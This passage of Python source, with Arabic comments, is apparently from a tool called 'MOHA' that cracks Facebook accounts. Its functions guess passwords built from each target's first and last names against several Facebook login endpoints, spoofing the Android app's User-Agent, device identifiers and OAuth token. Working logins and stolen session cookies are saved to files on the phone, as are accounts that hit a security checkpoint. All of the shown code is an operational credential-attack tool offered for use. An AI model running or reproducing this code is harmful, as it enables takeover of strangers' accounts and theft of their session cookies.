                # حالة المصادقة الثنائية 2F
                print(f'\r\r{B} [MOHA-2F] {ids} | {pas}{W}')
                break
            elif 'www.facebook.com' in str(po.get('error', {}).get('message', '')):
                # حالة الـ CP
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
            else:
                continue
        loop+=1
    except Exception as e:
        pass
#method3
def api3(ids,names,passlist):
    try:
        global oks,loop,cps,sim_id
        # عداد الصيد بنظام XN الفخم
        sys.stdout.write(f'\r\r{W} [MOHA-M3] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
        sys.stdout.flush()
        
        fn = names.split(' ')[0]
        try: ln = names.split(' ')[1]
        except: ln = fn
            
        for pw in passlist:
            pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
            
            # متغيرات فيسبوك الديناميكية
            fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
            fbbv = str(random.randint(111111111,999999999))
            fbrv = str(random.randint(111111111,999999999))
            
            # بناء UA احترافي يعتمد على بيانات جهاز المستخدم الحقيقية
            ua = f'Davik/2.1.0 (Linux; U; Android {device["android_version"]}.0.1; {device["model"]} Build/{device["build"]}) [FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};FBDM/' + '{density=3.0,width=1440,height=8797};' + f'FBLC/{device["fblc"]};FBRV/{fbrv};FBCR/{sim_id};FBMF/{device["fbmf"]};FBBD/{device["fbbd"]};FBPN/com.facebook.katana;FBDV/{device["model"]};FBSV/{device["android_version"]};FBOP/19;FBCA/{device["fbca"]};]'
            
            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits.lower(), k=16)))
            
            data = {
                "adid": adid,
                "format": "json",
                "device_id": str(uuid.uuid4()),
                "email": ids,
                "password": pas,
                "generate_analytics_claims": "1",
                "credentials_type": "password",
                "source": "login",
                "error_detail_type": "button_with_disabled",
                "enroll_misauth": "false",
                "generate_session_cookies": "1",
                "generate_machine_id": "1",
                "fb_api_req_friendly_name": "authenticate",
            }
            
            headers = {
                "Accept-Encoding": "gzip, deflate",
                "Accept": "*/*",
                "Connection": "keep-alive",
                "User-Agent": ua,
                "Authorization": "OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32",
                "X-FB-Friendly-Name": "authenticate",
                "X-FB-Connection-Type": "unknown",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-FB-HTTP-Engine": "Liger"
            }
            
            url = 'https://b-graph.facebook.com/auth/login'
            twf_check = 'Login approval'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                coki = ";".join(i["name"]+"="+i["value"] for i in po["session_cookies"])
                print(f"{G} Cookie: {W}{coki}")
                open('/sdcard/MOHA-COOKIE.txt','a').write(coki+'\n')
                open('/sdcard/MOHA-OK.txt','a').write(ids+'|'+pas+'\n')
                oks.append(ids)
                break
            elif twf_check in str(po):
                print(f'\r\r{B} [MOHA-2F] {ids} | {pas}{W}')
                break
            elif 'www.facebook.com' in str(po.get('error', {}).get('message', '')):
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
            else:
                continue
        loop+=1
    except Exception as e:
        pass
#b-api method
#method3   
def api4(ids,names,passlist):
    try:
        global oks,loop,cps,sim_id
        # ستايل العداد الموحد XN
        sys.stdout.write(f'\r\r{W} [MOHA-M4] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
        sys.stdout.flush()
        
        fn = names.split(' ')[0]
        try: ln = names.split(' ')[1]
        except: ln = fn
            
        for pw in passlist:
            pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
            
            # بيانات فيسبوك متغيرة لكل محاولة
            fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
            fbbv = str(random.randint(111111111,999999999))
            accessToken = '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
            
            # بناء UA احترافي متناسق مع ميثود 4
            ua = f'Davik/2.1.0 (Linux; U; Android {device["android_version"]}.0.1; {device["model"]} Build/{device["build"]}) [FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};FBDM/' + '{density=3.0,width=1080,height=2376};' + f'FBLC/{device["fblc"]};FBRV/{str(random.randint(000000000,999999999))};FBCR/{sim_id};FBMF/{device["fbmf"]};FBBD/{device["fbbd"]};FBPN/com.facebook.katana;FBDV/{device["model"]};FBSV/{device["android_version"]};FBOP/19;FBCA/{device["fbca"]};]'
            
            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits.lower(), k=16)))
            device_id = str(uuid.uuid4())
            
            data = {
                'adid':adid,
                'format':'json',
                'device_id':device_id,
                'email':ids,
                'password':pas,
                'generate_analytics_claims':'1',
                'credentials_type':'password',
                'source':'login',
                'error_detail_type':'button_with_disabled',
                'enroll_misauth':'false',
                'generate_session_cookies':'1',
                'generate_machine_id':'1',
                'meta_inf_fbmeta':'',
                'currently_logged_in_userid':'0',
                'fb_api_req_friendly_name':'authenticate',
            }
            
            headers = {
                'Authorization':f'OAuth {accessToken}',
                'X-FB-Friendly-Name':'authenticate',
                'X-FB-Connection-Type':'unknown',
                'User-Agent':ua,
                'Accept-Encoding':'gzip, deflate',
                'Content-Type': 'application/x-www-form-urlencoded',
                'X-FB-HTTP-Engine': 'Liger'
            }
            
            url = 'https://b-api.facebook.com/method/auth.login'
            twf_msg = 'Login approval'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                # حالة النجاح OK
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                open('/sdcard/MOHA-OK.txt','a').write(ids+'|'+pas+'\n')
                oks.append(ids)
                break
            elif twf_msg in str(po):
                # حالة المصادقة الثنائية 2F
                print(f'\r\r{B} [MOHA-2F] {ids} | {pas}{W}')
                break
            elif 'www.facebook.com' in str(po.get('error_msg', '')):
                # حالة الـ CP
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
            else:
                continue
        loop+=1
    except Exception as e:
        pass
#4method
def api5(ids,names,passlist):
    try:
        global oks,loop,cps,sim_id
        # ستايل العداد الموحد XN
        sys.stdout.write(f'\r\r{W} [MOHA-M5] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
        sys.stdout.flush()
        
        fn = names.split(' ')[0]
        try: ln = names.split(' ')[1]
        except: ln = fn
            
        for pw in passlist:
            pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
            
            # متغيرات الجهاز والفيسبوك
            fbav_rand = f'{random.randint(111,555)}.0.0.{random.randint(1,19)}.{random.randint(111,555)}'
            fbbv_rand = str(random.randint(745000000,745999999))
            build_rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
            
            # بناء UA مخصص لـ AdsManager (قوي جداً للتخطي)
            ua = f"Davik/2.1.0 (Linux; U; Android {device['fbsv']}.0.0; {device['model']} Build/{build_rand}) [FBAN/FB4A;FBAV/{fbav_rand};FBBV/{fbbv_rand};FBDM/" + "{density=2.25,width=720,height=1452};" + f"FBLC/en_US;FBCR/{sim_id};FBMF/{device['fbmf']};FBBD/{device['fbbd']};FBPN/com.facebook.adsmanager;FBDV/{device['model']};FBSV/4.4.4;nullFBCA/armeabi-v7a:armeabi;]"
            
            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits.lower(), k=16)))
            
            data = {
                "adid": adid,
                "format": "json",
                "device_id": str(uuid.uuid4()),
                "cpl": "true",
                "family_device_id": str(uuid.uuid4()),
                "credentials_type": "device_based_login_password",
                "error_detail_type": "button_with_disabled",
                "source": "device_based_login",
                "email": ids,
                "password": pas,
                "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
                "generate_session_cookies": "1",
                "meta_inf_fbmeta": "",
                "advertiser_id": str(uuid.uuid4()),
                "currently_logged_in_userid": "0",
                "locale": "en_US",
                "client_country_code": "US",
                "method": "auth.login",
                "fb_api_req_friendly_name": "authenticate",
                "fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
                "api_key": "882a8490361da98702bf97a021ddc14d"
            }
            
            headers = {
                'User-Agent': ua,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Host': 'graph.facebook.com',
                'X-FB-Net-HNI': str(random.randint(20000, 40000)),
                'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
                'X-FB-Connection-Type': 'MOBILE.LTE',
                'X-Tigon-Is-Retry': 'False',
                'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
                'x-fb-device-group': '5120',
                'X-FB-Friendly-Name': 'authenticate',
                'X-FB-HTTP-Engine': 'Liger',
                'Connection': 'keep-alive'
            }
            
            url = 'https://b-graph.facebook.com/auth/login'
            twf_msg = 'Login approval'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                coki = ";".join(i["name"]+"="+i["value"] for i in po["session_cookies"])
                open('/sdcard/MOHA-OK.txt','a').write(ids+'|'+pas+'\n')
                open('/sdcard/MOHA-COKIE.txt','a').write(ids+'|'+pas+'|'+coki+'\n')
                oks.append(ids)
                break
            elif twf_msg in str(po):
                print(f'\r\r{B} [MOHA-2F] {ids} | {pas}{W}')
                break
            elif 'www.facebook.com' in str(po.get('error', {}).get('message', '')):
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
            else:
                continue
        loop+=1
    except Exception as e:
        pass
def api6(ids,names,passlist):
    global loop,oks,cps
    # عداد الصيد بنمط XN
    sys.stdout.write(f'\r\r{W} [MOHA-M6] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
    sys.stdout.flush()
    session = requests.Session()
    try:
        first = names.split(' ')[0]
        try: last = names.split(' ')[1]
        except: last = 'Khan'
        ps = first.lower()
        ps2 = last.lower()
        
        for fikr in passlist:
            pas = fikr.replace('First',first).replace('Last',last).replace('first',ps).replace('last',ps2)
            ua = random.choice(ugen) # استخدام قائمة الـ User-Agents الخاصة بك
            
            # الرأسية الخاصة بمتصفح p.facebook
            head = {
                'Host': 'p.facebook.com',
                'viewport-width': '980',
                'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="109", "Google Chrome";v="109"',
                'sec-ch-ua-mobile': '?0',
                'sec-ch-ua-platform':'"Windows"',
                'dnt': '1',
                'upgrade-insecure-requests': '1',
                'user-agent': ua,
                'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
                'sec-fetch-site': 'none',
                'sec-fetch-mode': 'navigate',
                'sec-fetch-user': '?1',
                'sec-fetch-dest': 'document',
                'accept-language': 'en-US,en;q=0.9'
            }
            
            # جلب صفحة الدخول لاستخراج البيانات الأمنية
            getlog = session.get(f'https://p.facebook.com/login/device-based/password/?uid={ids}&flow=login_no_pin&refsrc=deprecated&_rdr')
            
            idpass = {
                "lsd": re.search('name="lsd" value="(.*?)"', str(getlog.text)).group(1),
                "jazoest": re.search('name="jazoest" value="(.*?)"', str(getlog.text)).group(1),
                "uid": ids,
                "next": "https://p.facebook.com/login/save-device/",
                "flow": "login_no_pin",
                "pass": pas,
            }
            
            complete = session.post('https://p.facebook.com/login/device-based/validate-password/?shbl=0', data=idpass, allow_redirects=False, headers=head)
            SK = session.cookies.get_dict().keys()
            
            if "c_user" in SK:
                # نجاح الصيد واستخراج الكوكيز
                kuki = (";").join([ "%s=%s" % (key, value) for key, value in session.cookies.get_dict().items() ])
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                open('/sdcard/MOHA-OK.txt', 'a').write(ids+'|'+pas+'\n')
                oks.append(ids)
                break
            elif 'checkpoint' in SK:
                # حالة الـ CP
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt', 'a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt', 'a').write(ids+'|'+pas+'\n')
                    break
            else:
                continue
    except requests.exceptions.ConnectionError:
        time.sleep(20)
    except Exception as e:
        pass
    loop+=1
def api7(ids,names,passlist):
    global loop,oks,cps
    # عداد الصيد بنظام XN
    sys.stdout.write(f'\r\r{W} [MOHA-M7] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
    sys.stdout.flush()
    session = requests.Session()
    try:
        first = names.split(' ')[0]
        try: last = names.split(' ')[1]
        except: last = 'Khan'
        ps = first.lower()
        ps2 = last.lower()
        
        for fikr in passlist:
            pas = fikr.replace('First',first).replace('Last',last).replace('first',ps).replace('last',ps2)
            ua = random.choice(ugen)
            
            # الرأسية الخاصة بمتصفح d.facebook (أخف وأسرع)
            head = {
                'Host': 'd.facebook.com',
                'viewport-width': '980',
                'upgrade-insecure-requests': '1',
                'user-agent': ua,
                'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
                'dnt': '1',
                'sec-fetch-site': 'none',
                'sec-fetch-mode': 'navigate',
                'sec-fetch-user': '?1',
                'sec-fetch-dest': 'document',
                'accept-language': 'en-US,en;q=0.9'
            }
            
            getlog = session.get(f'https://d.facebook.com/login/device-based/password/?uid={ids}&flow=login_no_pin&refsrc=deprecated&_rdr')
            
            idpass = {
                "lsd": re.search('name="lsd" value="(.*?)"', str(getlog.text)).group(1),
                "jazoest": re.search('name="jazoest" value="(.*?)"', str(getlog.text)).group(1),
                "uid": ids,
                "next": "https://d.facebook.com/login/save-device/",
                "flow": "login_no_pin",
                "pass": pas,
            }
            
            complete = session.post('https://d.facebook.com/login/device-based/validate-password/?shbl=0', data=idpass, allow_redirects=False, headers=head)
            SK = session.cookies.get_dict().keys()
            
            if "c_user" in SK:
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                open('/sdcard/MOHA-OK.txt', 'a').write(ids+'|'+pas+'\n')
                oks.append(ids)
                break
            elif 'checkpoint' in SK:
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt', 'a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt', 'a').write(ids+'|'+pas+'\n')
                    break
            else:
                continue
    except requests.exceptions.ConnectionError:
        time.sleep(20)
    except Exception as e:
        pass
    loop+=1
#method7
def api8(ids,names,passlist):
    global loop,oks,cps
    # عداد الصيد بنظام XN المميز
    sys.stdout.write(f'\r\r{W} [MOHA-M8] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
    sys.stdout.flush()
    session = requests.Session()
    try:
        first = names.split(' ')[0]
        try: last = names.split(' ')[1]
        except: last = 'Khan'
        ps = first.lower()
        ps2 = last.lower()
        
        for fikr in passlist:
            pas = fikr.replace('First',first).replace('Last',last).replace('first',ps).replace('last',ps2)
            ua = random.choice(ugen)
            
            # رأسية مخصصة للوضع المجاني لزيادة الاستقرار
            head = {
                'Host': 'free.facebook.com',
                'viewport-width': '980',
                'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="109", "Google Chrome";v="109"',
                'sec-ch-ua-mobile': '?1', # تفعيل وضع الموبايل
                'sec-ch-ua-platform':'"Android"',
                'dnt': '1',
                'upgrade-insecure-requests': '1',
                'user-agent': ua,
                'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
                'sec-fetch-site': 'none',
                'sec-fetch-mode': 'navigate',
                'sec-fetch-user': '?1',
                'sec-fetch-dest': 'document',
                'accept-language': 'en-US,en;q=0.9'
            }
            
            # جلب صفحة الدخول لاستخراج lsd و jazoest
            getlog = session.get(f'https://free.facebook.com/login/device-based/password/?uid={ids}&flow=login_no_pin&refsrc=deprecated&_rdr')
            
            # استخراج البيانات الأمنية
            lsd_val = re.search('name="lsd" value="(.*?)"', str(getlog.text)).group(1)
            jazoest_val = re.search('name="jazoest" value="(.*?)"', str(getlog.text)).group(1)
            
            idpass = {
                "lsd": lsd_val,
                "jazoest": jazoest_val,
                "uid": ids,
                "next": "https://free.facebook.com/login/save-device/",
                "flow": "login_no_pin",
                "pass": pas,
            }
            
            # إرسال طلب تسجيل الدخول
            complete = session.post('https://free.facebook.com/login/device-based/validate-password/?shbl=0', data=idpass, allow_redirects=False, headers=head)
            SK = session.cookies.get_dict().keys()
            
            if "c_user" in SK:
                # حالة النجاح OK
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                open('/sdcard/MOHA-OK.txt', 'a').write(ids+'|'+pas+'\n')
                oks.append(ids)
                break
            elif 'checkpoint' in SK:
                # حالة الـ CP
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt', 'a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt', 'a').write(ids+'|'+pas+'\n')
                    break
            else:
                continue
    except requests.exceptions.ConnectionError:
        time.sleep(20)
    except Exception as e:
        pass
    loop+=1
#method1rnd
def trt1(ids,passlist):
    global loop, oks, cps, sim_id
    # عداد الصيد بنظام XN الفخم
    sys.stdout.write(f'\r\r{W} [MOHA-M1] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
    sys.stdout.flush()
    
    try:
        for pas in passlist:
            # إعدادات الـ API والـ Token
            accessToken = '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
            fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
            fbbv = str(random.randint(111111111,999999999))
            
            # بناء User-Agent احترافي يعتمد على بيانات جهازك
            ua = f'Davik/2.1.0 (Linux; U; Android {device["android_version"]}.0.1; {device["model"]} Build/{device["build"]}) [FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};FBDM/' + '{density=2.97,width=720,height=1612};' + f'FBLC/{device["fblc"]};FBRV/{str(random.randint(000000000,999999999))};FBCR/{sim_id};FBMF/{device["fbmf"]};FBBD/{device["fbbd"]};FBPN/com.facebook.katana;FBDV/{device["model"]};FBSV/{device["android_version"]};FBOP/19;FBCA/{device["fbca"]};]'
            
            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits.lower(), k=16)))
            
            data = {
                "adid": adid,
                "format": "json",
                "device_id": str(uuid.uuid4()),
                "cpl": "true",
                "family_device_id": str(uuid.uuid4()),
                "credentials_type": "device_based_login_password",
                "error_detail_type": "button_with_disabled",
                "source": "device_based_login",
                "email": ids,
                "password": pas,
                "access_token": accessToken,
                "generate_session_cookies": "1",
                "meta_inf_fbmeta": "",
                "advertiser_id": str(uuid.uuid4()),
                "currently_logged_in_userid": "0",
                "locale": "en_US",
                "client_country_code": "US",
                "method": "auth.login",
                "fb_api_req_friendly_name": "authenticate",
                "fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
                "api_key": "882a8490361da98702bf97a021ddc14d",
            }
            
            headers = {
                'User-Agent': ua,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Host': 'graph.facebook.com',
                'X-FB-Net-HNI': str(random.randint(20000, 50000)),
                'X-FB-SIM-HNI': str(random.randint(20000, 50000)),
                'X-FB-Connection-Type': 'MOBILE.LTE',
                'X-Tigon-Is-Retry': 'False',
                'X-FB-Friendly-Name': 'authenticate',
                'X-FB-HTTP-Engine': 'Liger',
                'Connection': 'keep-alive'
            }
            
            url = 'https://b-graph.facebook.com/auth/login'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                uid = str(po.get('uid', ids))
                if uid in oks:
                    break
                else:
                    print(f'\r\r{G} [MOHA-OK] {uid} | {pas}{W}')
                    open('/sdcard/MOHA-rnd-OK.txt','a').write(uid+'|'+pas+'\n')
                    oks.append(uid)
                    break
            elif 'www.facebook.com' in str(po.get('error', {}).get('message', '')):
                uid = str(po.get('error', {}).get('error_data', {}).get('uid', ids))
                if uid in oks: 
                    pass
                else:
                    print(f'\r\r{Y} [MOHA-CP] {uid} | {pas}{W}')
                    open('/sdcard/MOHA-rnd-CP.txt','a').write(uid+'|'+pas+'\n')
                    cps.append(uid)
                    break
            else:
                continue
        loop += 1
    except Exception as e:
        pass
def trt2(ids,passlist):
    global loop, oks, cps, device, sim_id
    try:
        for pas in passlist:
            # عداد الصيد الاحترافي بنمط XN
            sys.stdout.write(f'\r\r{W} [MOHA-M2] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
            sys.stdout.flush()
            
            # توليد بيانات الجهاز بشكل ديناميكي
            application_version = f"{random.randint(111,555)}.0.0.{random.randrange(9,49)}.{random.randint(111,555)}"
            application_version_code = str(random.randint(100000000,999999999))
            
            # بناء User-Agent مخصص لـ MobileAdsManager
            ua_string = f'Dalvik/2.1.0 (Linux; U; Android {device["android_version"]}; {device["model"]} Build/{device["build"]}) [FBAN/MobileAdsManagerAndroid;FBAV/{application_version};FBBV/{application_version_code};FBRV/0;FBLC/{device["fblc"]};FBMF/{device["fbmf"]};FBBD/{device["fbbd"]};FBDV/{device["model"]};FBSV/{device["android_version"]};FBCA/{device["fbca"]};FBDM/' + '{density=2.97,width=720,height=1612};' + 'FB_FW/1;]'
            
            device_family_id = str(uuid.uuid4())
            adid = str(uuid.uuid4())
            machine_id = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '_') for _ in range(24))
            
            data = {
                'adid': adid,
                'format': 'json',
                'device_id': device_family_id,
                'email': ids,
                'password': pas,
                'generate_analytics_claim': '1',
                'community_id': '',
                'cpl': 'true',
                'try_num': '1',
                'family_device_id': device_family_id,
                'credentials_type': 'device_based_login_password',
                'generate_session_cookies': '1',
                'error_detail_type': 'button_with_disabled',
                'source': 'device_based_login',
                'machine_id': machine_id,
                'login_location_accuracy_m': '1.0',
                'meta_inf_fbmeta': '',
                'advertiser_id': adid,
                'encrypted_msisdn': '',
                'currently_logged_in_userid': '0',
                'locale': 'en_US',
                'client_country_code': 'US',
                'method': 'auth.login',
                'fb_api_req_friendly_name': 'authenticate',
                'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler',
                'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
            }
            
            head = {
                'content-type': 'application/x-www-form-urlencoded',
                'x-fb-sim-hni': str(random.randint(20000, 40000)),
                'x-fb-connection-type': 'MOBILE.LTE',
                'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32',
                'user-agent': ua_string,
                'x-fb-net-hni': str(random.randint(20000, 40000)),
                'x-fb-connection-bandwidth': str(random.randint(20000000, 30000000)),
                'x-fb-connection-quality': 'EXCELLENT',
                'x-fb-friendly-name': 'authenticate',
                'accept-encoding': 'gzip, deflate',
                'x-fb-http-engine': 'Liger'
            }
            
            url = 'https://b-api.facebook.com/method/auth.login'
            po = requests.post(url, data=data, headers=head, allow_redirects=False).text
            q = json.loads(po)
            
            if 'session_key' in q:
                udx = str(q.get('uid', ids))
                print(f'\r\r{G} [MOHA-OK] {udx} | {pas}{W}')
                open('/sdcard/MOHA-rnd-OK.txt', 'a').write(udx+'|'+pas+'\n')
                oks.append(udx)
                break
            elif 'www.facebook.com' in str(q.get('error_msg', '')):
                print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                open('/sdcard/MOHA-rnd-CP.txt', 'a').write(ids+'|'+pas+'\n')
                cps.append(ids)
                break
            else:
                continue
        loop += 1
    except requests.exceptions.ConnectionError:
        time.sleep(10)
    except Exception as e:
        pass
#new method
def trt3(ids, passlist):
    global loop, oks, cps, device, sim_id
    # عداد الصيد الاحترافي بنمط XN الموحد
    sys.stdout.write(f'\r\r{W} [MOHA-M3] {G}%s{W}|{G}OK:-%s {W}' % (loop, len(oks)))
    sys.stdout.flush()
    
    try:
        for pas in passlist:
            accessToken = '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
            fbav = f'{random.randint(111, 999)}.0.0.{random.randint(11, 99)}.{random.randint(111, 999)}'
            fbbv = str(random.randint(111111111, 999999999))
            
            # بناء User-Agent احترافي متوافق مع خوادم AdsManager
            ua = (f"Davik/2.1.0 (Linux; U; Android {device['fbsv']}.0.0; {device['model']} "
                  f"Build/{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))}) "
                  f"[FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};FBDM/{{density=2.25,width=720,height=1452}}; "
                  f"FBLC/en_US;FBCR/{sim_id};FBMF/{device['fbmf']};FBBD/{device['fbbd']}; "
                  f"FBPN/com.facebook.adsmanager;FBDV/{device['model']};FBSV/4.4.4;nullFBCA/armeabi-v7a:armeabi;]")

            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits.lower(), k=16)))
            device_id = str(uuid.uuid4())
            
            data = {
                'adid': adid,
                'format': 'json',
                'device_id': device_id,
                'email': ids,
                'password': pas,
                'generate_analytics_claims': '1',
                'credentials_type': 'password',
                'source': 'login',
                'error_detail_type': 'button_with_disabled',
                'enroll_misauth': 'false',
                'generate_session_cookies': '1',
                'generate_machine_id': '1',
                'fb_api_req_friendly_name': 'authenticate',
            }
            
            headers = {
                'Authorization': f'OAuth {accessToken}',
                'X-FB-Friendly-Name': 'authenticate',
                'X-FB-Connection-Type': 'MOBILE.LTE',
                'User-Agent': ua,
                'Accept-Encoding': 'gzip, deflate',
                'Content-Type': 'application/x-www-form-urlencoded',
                'X-FB-HTTP-Engine': 'Liger'
            }
            
            url = 'https://b-graph.facebook.com/auth/login'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                uid = str(po.get('uid', ids))
                if uid in oks:
                    break
                else:
                    print(f'\r\r{G} [MOHA-OK] {uid} | {pas}{W}')
                    # استخراج الكوكيز إذا كنت بحاجة لها
                    coki = ";".join(i["name"]+"="+i["value"] for i in po.get("session_cookies", []))
                    open('/sdcard/MOHA-rnd-OK.txt', 'a').write(uid + '|' + pas + '\n')
                    oks.append(uid)
                    break
            elif 'www.facebook.com' in str(po.get('error', {}).get('message', '')):
                uid = str(po.get('error', {}).get('error_data', {}).get('uid', ids))
                if uid in oks:
                    pass
                else:
                    print(f'\r\r{Y} [MOHA-CP] {uid} | {pas}{W}')
                    open('/sdcard/MOHA-rnd-CP.txt', 'a').write(uid + '|' + pas + '\n')
                    cps.append(uid)
                    break
            else:
                continue
        loop += 1
    except Exception as e:
        pass
#method4
def trt4(ids, passlist):
    global loop, oks, cps, device, sim_id
    # عداد الصيد بنظام XN الفخم
    sys.stdout.write(f'\r\r{W} [MOHA-M4] {G}%s{W}|{G}OK:-%s {W}' % (loop, len(oks)))
    sys.stdout.flush()
    
    try:
        for pas in passlist:
            accessToken = '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
            fbav = f'{random.randint(111, 999)}.0.0.{random.randint(11, 99)}.{random.randint(111, 999)}'
            fbbv = str(random.randint(111111111, 999999999))
            
            # بناء User-Agent عالي الدقة (High Resolution) لمحاكاة الأجهزة القوية
            ua = (f'Davik/2.1.0 (Linux; U; Android {device["android_version"]}.0.1; {device["model"]} Build/{device["build"]}) '
                  f'[FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};FBDM/{{density=3.0,width=1440,height=3130}};FBLC/{device["fblc"]};'
                  f'FBRV/{str(random.randint(000000000, 999999999))};FBCR/{sim_id};FBMF/{device["fbmf"]};FBBD/{device["fbbd"]};'
                  f'FBPN/com.facebook.katana;FBDV/{device["model"]};FBSV/{device["fbsv"]};FBOP/19;FBCA/{device["fbca"]};]')

            random_seed = random.Random()
            adid = str(''.join(random_seed.choices(string.hexdigits.lower(), k=16)))
            device_id = str(uuid.uuid4())
            
            data = {
                'adid': adid,
                'format': 'json',
                'device_id': device_id,
                'email': ids,
                'password': pas,
                'generate_analytics_claims': '1',
                'credentials_type': 'password',
                'source': 'login',
                'error_detail_type': 'button_with_disabled',
                'enroll_misauth': 'false',
                'generate_session_cookies': '1',
                'generate_machine_id': '1',
                'fb_api_req_friendly_name': 'authenticate',
            }
            
            headers = {
                'Authorization': f'OAuth {accessToken}',
                'X-FB-Friendly-Name': 'authenticate',
                'X-FB-Connection-Type': 'MOBILE.LTE',
                'User-Agent': ua,
                'Accept-Encoding': 'gzip, deflate',
                'Content-Type': 'application/x-www-form-urlencoded',
                'X-FB-HTTP-Engine': 'Liger'
            }
            
